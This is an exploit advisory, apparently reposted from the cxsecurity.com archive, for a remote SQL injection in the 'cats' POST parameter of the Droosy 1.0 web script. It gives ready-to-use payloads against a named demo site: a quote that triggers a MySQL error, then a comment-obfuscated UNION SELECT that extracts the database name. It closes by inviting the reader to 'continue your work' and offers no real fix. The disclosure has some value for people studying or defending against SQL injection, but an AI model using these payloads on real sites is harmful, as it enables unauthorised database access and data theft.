Droosy 1,0 (cats) Remote SQL Injection

2009.04.26
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Name Of Script : Droosy Version 1,0 # Comapny Site : http://www.emides.com/our_scripts.emi?id=14 # Demo : http://ad.ae/droosy/ # Found By : RoMaNcYxHaCkEr # Contact With Me : rxh0@hotmail.com # My Group : Security - Codes # My Homepage : WwW.Sec-Code.CoM # Type Of Exploit : Remote SQL Injection By [POST Method] # Explaintion Of Video Of This Exploit Download Here : http://www.mediafire.com/?zgtjzmznwd2 # Author has no responsibility over the damage you do with this! It,s Just Educational Manner :) ================================================================================================================== # P.O.C : The Vulne In Cat Variable In The Main Index But The Script Is Demo And We Try To Know The Variables Of Some File And The Mod_Rewrite Making The Proplem To Identify It,s ... The Proplem If You See The Video In Cats Variable Not On Search Box .... Here The Result Of Search : http://ad.ae/droosy/result.html Copy And Post This Variable If You Have Specific Tool For POST Method Like In Video If You See It,s :) : linkname=rxh&cats='&B1=%C5%C8%CD%CB So We See The Error : يبدو أن هنالك خطأ في قاعدة البيانات الخطأ هو : تم تنفيذ عبارة SQL خاطئة قاعدة البيانات قامت بإرجاع المعلومات التالية عن الخطأ :You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1 رقم الخطأ الذي أعادته قاعدة البيانات: 1064 So Let,s Apply This linkname=rxh&cats='/**/union/**/select/**/0,1,database(),3,4,5,6/*&B1=%C5%C8%CD%CB And See The Name Of Database : adminad_droos So Continue Your Work ... :) ================================================================================================================== # Solution : Contact With Me I Will Filter This Fucking Uses :) # rXh # bEST wISHES


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top